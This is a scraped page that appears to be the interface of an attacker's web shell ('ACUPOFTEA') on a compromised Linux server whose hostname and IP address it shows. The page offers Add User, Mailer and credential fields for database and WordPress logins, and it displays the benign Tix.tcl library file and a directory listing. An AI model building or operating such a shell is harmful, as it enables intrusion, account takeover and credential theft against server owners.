System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
tcl8.6
/
Tix8.4.3
/
216.73.216.6
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
Tix.tcl
# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*- # # $Id: Tix.tcl,v 1.14 2008/03/17 23:01:10 hobbs Exp $ # # Tix.tcl -- # # This file implements the Tix application context class # # Copyright (c) 1993-1999 Ioi Kim Lam. # Copyright (c) 2000-2001 Tix Project Group. # Copyright (c) 2004 ActiveState # # See the file "license.terms" for information on usage and redistribution # of this file, and for a DISCLAIMER OF ALL WARRANTIES. # tixClass tixAppContext { -superclass {} -classname TixAppContext -method { cget configure addbitmapdir filedialog getbitmap getimage option platform resetoptions setbitmap initstyle } -flag { -binding -debug -extracmdargs -filedialog -fontset -grabmode -haspixmap -libdir -scheme -schemepriority -percentsubst } -readonly { -haspixmap } -configspec { {-binding TK} {-debug 0} {-extracmdargs 1} {-filedialog ""} {-fontset WmDefault} {-grabmode global} {-haspixmap 0} {-libdir ""} {-percentsubst 0} {-scheme WmDefault} {-schemepriority 21} } -alias { } } proc tixAppContext:Constructor {w} { upvar #0 $w data global tix_priv tix_library tixOption if {[info exists data(initialized)]} { error "tixAppContext has already be initialized" } else { set data(initialized) 1 } set data(et) [string equal $tix_library ""] set data(image) 0 # These options were set when Tix was loaded # set data(-binding) $tix_priv(-binding) set data(-debug) $tix_priv(-debug) set data(-fontset) $tix_priv(-fontset) set data(-scheme) $tix_priv(-scheme) set data(-schemepriority) $tix_priv(-schemepriority) if {![info exists tix_priv(isSafe)]} { set data(-libdir) [file normalize $tix_library] } set tixOption(prioLevel) $tix_priv(-schemepriority) # Compatibility stuff: the obsolete name courier_font has been changed to # fixed_font set tixOption(fixed_font) Courier set tixOption(courier_font) $tixOption(fixed_font) # Enable/Disable Intrinsics debugging # set tix_priv(debug) [string is true -strict $data(-debug)] tixAppContext:BitmapInit $w tixAppContext:FileDialogInit $w # Clean up any error message generated by the above loop set ::errorInfo "" } proc tixAppContext:initstyle {w} { # Do the init stuff here that affects styles upvar #0 $w data global tix_priv if {![info exists tix_priv(isSafe)]} { tixAppContext:config-fontset $w $data(-fontset) tixAppContext:config-scheme $w $data(-scheme) } tixAppContext:BitmapInit $w tixAppContext:FileDialogInit $w # Force the "." window to accept the new Tix options # set noconfig [list -class -colormap -container -menu -screen -use -visual] set noconfig [lsort $noconfig] foreach spec [. configure] { set flag [lindex $spec 0] if {[llength $spec] != 5 || [lsearch -exact -sorted $noconfig $flag] != -1} { continue } set name [lindex $spec 1] set class [lindex $spec 2] set value [option get . $name $class] catch {. configure $flag $value} } } #---------------------------------------------------------------------- # Configurations # #---------------------------------------------------------------------- proc tixAppContext:resetoptions {w scheme fontset {schemePrio ""}} { upvar #0 $w data if {! $data(et)} { global tixOption option clear if {$schemePrio != ""} { set tixOption(prioLevel) $schemePrio } tixAppContext:config-scheme $w $scheme tixAppContext:config-fontset $w $fontset } } proc tixAppContext:StartupError {args} { bgerror [join $args "\n"] } proc tixAppContext:config-fontset {w value} { upvar #0 $w data global tix_priv tixOption set data(-fontset) $value #----------------------------------- # Initialization of options database #----------------------------------- # Load the fontset # if {!$data(et)} { set prefDir [file join $data(-libdir) pref] set fontSetFile [file join $prefDir $data(-fontset).fsc] if {[file exists $fontSetFile]} { source $fontSetFile tixPref:InitFontSet:$data(-fontset) tixPref:SetFontSet:$data(-fontset) } else { tixAppContext:StartupError \ " Error: cannot use fontset \"$data(-fontset)\"" \ " Using default fontset " tixSetDefaultFontset } } else { if [catch { tixPref:InitFontSet:$data(-fontset) tixPref:SetFontSet:$data(-fontset) }] { # User chose non-existent fontset # tixAppContext:StartupError \ " Error: cannot use fontset \"$data(-fontset)\"" \ " Using default fontset " tixSetDefaultFontset } } } proc tixAppContext:config-scheme {w value} { upvar #0 $w data global tix_priv set data(-scheme) $value # Load the color scheme # if {!$data(et)} { set schemeName [file join [file join $data(-libdir) pref] \ $data(-scheme).csc] if {[file exists $schemeName]} { source $schemeName tixPref:SetScheme-Color:$data(-scheme) } else { tixAppContext:StartupError \ " Error: cannot use color scheme \"$data(-scheme)\"" \ " Using default color scheme" tixSetDefaultScheme-Color } } else { if [catch {tixPref:SetScheme-Color:$data(-scheme)}] { # User chose non-existent color scheme # tixAppContext:StartupError \ " Error: cannot use color scheme \"$data(-scheme)\"" \ " Using default color scheme" tixSetDefaultScheme-Color } } } #---------------------------------------------------------------------- # Private methods # #---------------------------------------------------------------------- proc tixAppContext:BitmapInit {w} { upvar #0 $w data # See whether we have pixmap extension # set data(-haspixmap) true # Dynamically set the bitmap directory # if {! $data(et)} { set data(bitmapdirs) [list [file join $data(-libdir) bitmaps]] } else { set data(bitmapdirs) "" } } proc tixAppContext:FileDialogInit {w} { upvar #0 $w data if {$data(-filedialog) == ""} { set data(-filedialog) [option get . fileDialog FileDialog] } if {$data(-filedialog) == ""} { set data(-filedialog) tixFileSelectDialog } } #---------------------------------------------------------------------- # Public methods #---------------------------------------------------------------------- proc tixAppContext:addbitmapdir {w bmpdir} { upvar #0 $w data if {[lsearch $data(bitmapdirs) $bmpdir] == -1} { lappend data(bitmapdirs) $bmpdir } } proc tixAppContext:getimage {w name} { upvar #0 $w data global tix_priv if {[info exists data(img:$name)]} { return $data(img:$name) } if {![info exists tix_priv(isSafe)]} { foreach dir $data(bitmapdirs) { foreach {ext type} { .xpm pixmap .gif photo .ppm photo .xbm bitmap "" bitmap } { set file [file join $dir $name$ext] if {[file exists $file] && ![catch { set img tiximage$data(image) set data(img:$name) \ [image create $type $img -file $file] }]} { incr data(image) break } } if {[info exists data(img:$name)]} { return $data(img:$name) } } } if {![info exists data(img:$name)]} { catch { set img tiximage$data(image) # This is for compiled-in images set data(img:$name) [image create pixmap $img -id $name] } err if {[string match internal* $err]} { error $err } else { incr data(image) } } if {[info exists data(img:$name)]} { return $data(img:$name) } else { error "image file \"$name\" cannot be found" } } proc tixAppContext:getbitmap {w bitmapname} { upvar #0 $w data global tix_priv if {[info exists data(bmp:$bitmapname)]} { return $data(bmp:$bitmapname) } else { set ext [file extension $bitmapname] if {$ext == ""} { set ext .xbm } # This is the fallback value. If we can't find the bitmap in # the bitmap directories, then use the name of the bitmap # as the default value. # set data(bmp:$bitmapname) $bitmapname if {[info exists tix_priv(isSafe)]} { return $data(bmp:$bitmapname) } foreach dir $data(bitmapdirs) { if {$ext eq ".xbm" && [file exists [file join $dir $bitmapname.xbm]]} { set data(bmp:$bitmapname) \ @[file join $dir $bitmapname.xbm] break } if {[file exists [file join $dir $bitmapname]]} { set data(bmp:$bitmapname) @[file join $dir $bitmapname] break } } return $data(bmp:$bitmapname) } } proc tixAppContext:filedialog {w {type tixFileSelectDialog}} { upvar #0 $w data if {$type == ""} { set type $data(-filedialog) } if {![info exists data(filedialog,$type)]} { set data(filedialog,$type) "" } if {$data(filedialog,$type) == "" || \ ![winfo exists $data(filedialog,$type)]} { set data(filedialog,$type) [$type .tixapp_filedialog_$type] } return $data(filedialog,$type) } proc tixAppContext:option {w action {option ""} {value ""}} { global tixOption if {$action eq "get"} { if {$option == ""} {return [lsort [array names tixOption]]} return $tixOption($option) } } proc tixAppContext:platform {w} { return $::tcl_platform(platform) } proc tixDebug {message {level "1"}} { set debug [tix cget -debug] if {![string is true -strict $debug]} { return } if {$debug > 0} { # use $level here if {[catch {fconfigure stderr}]} { # This will happen under PYTHONW.EXE or frozen Windows apps proc tixDebug args {} } else { puts stderr $message } } } if {![llength [info commands toplevel]]} { interp alias {} toplevel {} frame }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-03-13 04:40:24
..
DIR
-
drwxr-xr-x
2024-03-13 04:40:24
bitmaps
DIR
-
drwxr-xr-x
2024-03-13 04:40:24
html
DIR
-
drwxr-xr-x
2019-10-22 12:47:10
pref
DIR
-
drwxr-xr-x
2024-03-13 04:40:24
Balloon.tcl
text/plain
12.97 KB
-rw-r--r--
2019-10-22 12:47:10
BtnBox.tcl
text/plain
2.61 KB
-rw-r--r--
2019-10-22 12:47:10
CObjView.tcl
text/plain
7.56 KB
-rw-r--r--
2019-10-22 12:47:10
ChkList.tcl
text/plain
4.97 KB
-rw-r--r--
2019-10-22 12:47:10
ComboBox.tcl
text/plain
35.42 KB
-rw-r--r--
2019-10-22 12:47:10
Compat.tcl
text/plain
870 B
-rw-r--r--
2019-10-22 12:47:10
Console.tcl
text/plain
14.95 KB
-rw-r--r--
2019-10-22 12:47:10
Control.tcl
text/plain
12.11 KB
-rw-r--r--
2019-10-22 12:47:10
DefSchm.tcl
text/plain
2.94 KB
-rw-r--r--
2019-10-22 12:47:10
DialogS.tcl
text/plain
4.2 KB
-rw-r--r--
2019-10-22 12:47:10
DirBox.tcl
text/plain
5.3 KB
-rw-r--r--
2019-10-22 12:47:10
DirDlg.tcl
text/plain
2.15 KB
-rw-r--r--
2019-10-22 12:47:10
DirList.tcl
text/plain
6.9 KB
-rw-r--r--
2019-10-22 12:47:10
DirTree.tcl
text/plain
8.76 KB
-rw-r--r--
2019-10-22 12:47:10
DragDrop.tcl
text/plain
3.93 KB
-rw-r--r--
2019-10-22 12:47:10
DtlList.tcl
text/plain
1002 B
-rw-r--r--
2019-10-22 12:47:10
EFileBox.tcl
text/plain
11.12 KB
-rw-r--r--
2019-10-22 12:47:10
EFileDlg.tcl
text/plain
1.68 KB
-rw-r--r--
2019-10-22 12:47:10
Event.tcl
text/plain
5.11 KB
-rw-r--r--
2019-10-22 12:47:10
FileBox.tcl
text/plain
14 KB
-rw-r--r--
2019-10-22 12:47:10
FileCbx.tcl
text/plain
2.42 KB
-rw-r--r--
2019-10-22 12:47:10
FileDlg.tcl
text/plain
2.13 KB
-rw-r--r--
2019-10-22 12:47:10
FileEnt.tcl
text/plain
7.15 KB
-rw-r--r--
2019-10-22 12:47:10
FloatEnt.tcl
text/plain
3.1 KB
-rw-r--r--
2019-10-22 12:47:10
Grid.tcl
text/plain
21.16 KB
-rw-r--r--
2019-10-22 12:47:10
HList.tcl
text/plain
17.72 KB
-rw-r--r--
2019-10-22 12:47:10
HListDD.tcl
text/plain
4.39 KB
-rw-r--r--
2019-10-22 12:47:10
IconView.tcl
text/plain
5.97 KB
-rw-r--r--
2019-10-22 12:47:10
Init.tcl
text/plain
6.05 KB
-rw-r--r--
2019-10-22 12:47:10
LabEntry.tcl
text/plain
2.09 KB
-rw-r--r--
2019-10-22 12:47:10
LabFrame.tcl
text/plain
1.15 KB
-rw-r--r--
2019-10-22 12:47:10
LabWidg.tcl
text/plain
3.86 KB
-rw-r--r--
2019-10-22 12:47:10
ListNBk.tcl
text/plain
3.5 KB
-rw-r--r--
2019-10-22 12:47:10
Meter.tcl
text/plain
3.04 KB
-rw-r--r--
2019-10-22 12:47:10
MultView.tcl
text/plain
3.62 KB
-rw-r--r--
2019-10-22 12:47:10
NoteBook.tcl
text/plain
6.02 KB
-rw-r--r--
2019-10-22 12:47:10
OldUtil.tcl
text/plain
2.98 KB
-rw-r--r--
2019-10-22 12:47:10
OptMenu.tcl
text/plain
9.17 KB
-rw-r--r--
2019-10-22 12:47:10
PanedWin.tcl
text/plain
27.68 KB
-rw-r--r--
2019-10-22 12:47:10
PopMenu.tcl
text/plain
5.37 KB
-rw-r--r--
2019-10-22 12:47:10
Primitiv.tcl
text/plain
10.28 KB
-rw-r--r--
2019-10-22 12:47:10
README.txt
text/plain
987 B
-rw-r--r--
2019-10-22 12:47:10
ResizeH.tcl
text/plain
12.94 KB
-rw-r--r--
2019-10-22 12:47:10
SGrid.tcl
text/plain
5.8 KB
-rw-r--r--
2019-10-22 12:47:10
SHList.tcl
text/plain
3.7 KB
-rw-r--r--
2019-10-22 12:47:10
SListBox.tcl
text/plain
6.97 KB
-rw-r--r--
2019-10-22 12:47:10
STList.tcl
text/plain
2.37 KB
-rw-r--r--
2019-10-22 12:47:10
SText.tcl
text/plain
3.09 KB
-rw-r--r--
2019-10-22 12:47:10
SWidget.tcl
text/plain
9.52 KB
-rw-r--r--
2019-10-22 12:47:10
SWindow.tcl
text/plain
6.75 KB
-rw-r--r--
2019-10-22 12:47:10
Select.tcl
text/plain
7.04 KB
-rw-r--r--
2019-10-22 12:47:10
Shell.tcl
text/plain
1.06 KB
-rw-r--r--
2019-10-22 12:47:10
SimpDlg.tcl
text/plain
1.13 KB
-rw-r--r--
2019-10-22 12:47:10
StackWin.tcl
text/plain
1.95 KB
-rw-r--r--
2019-10-22 12:47:10
StatBar.tcl
text/plain
1.31 KB
-rw-r--r--
2019-10-22 12:47:10
StdBBox.tcl
text/plain
1.62 KB
-rw-r--r--
2019-10-22 12:47:10
StdShell.tcl
text/plain
1.15 KB
-rw-r--r--
2019-10-22 12:47:10
TList.tcl
text/plain
17.59 KB
-rw-r--r--
2019-10-22 12:47:10
Tix.tcl
text/plain
9.51 KB
-rw-r--r--
2019-10-22 12:47:10
Tree.tcl
text/plain
4.57 KB
-rw-r--r--
2019-10-22 12:47:10
Utils.tcl
text/plain
10.54 KB
-rw-r--r--
2019-10-22 12:47:10
VResize.tcl
text/plain
4.95 KB
-rw-r--r--
2019-10-22 12:47:10
VStack.tcl
text/plain
9.42 KB
-rw-r--r--
2019-10-22 12:47:10
VTree.tcl
text/plain
4.31 KB
-rw-r--r--
2019-10-22 12:47:10
Variable.tcl
text/plain
2.5 KB
-rw-r--r--
2019-10-22 12:47:10
WInfo.tcl
text/plain
965 B
-rw-r--r--
2019-10-22 12:47:10
fs.tcl
text/plain
3.9 KB
-rw-r--r--
2019-10-22 12:47:10
libTix.so
application/x-sharedlib
341.3 KB
-rwxr-xr-x
2019-10-22 12:47:11
license.terms
text/plain
2.76 KB
-rw-r--r--
2019-10-22 12:47:10
pkgIndex.tcl
text/plain
122 B
-rw-r--r--
2019-10-22 12:47:10
~ ACUPOFTEA - mail.ontime-ae.com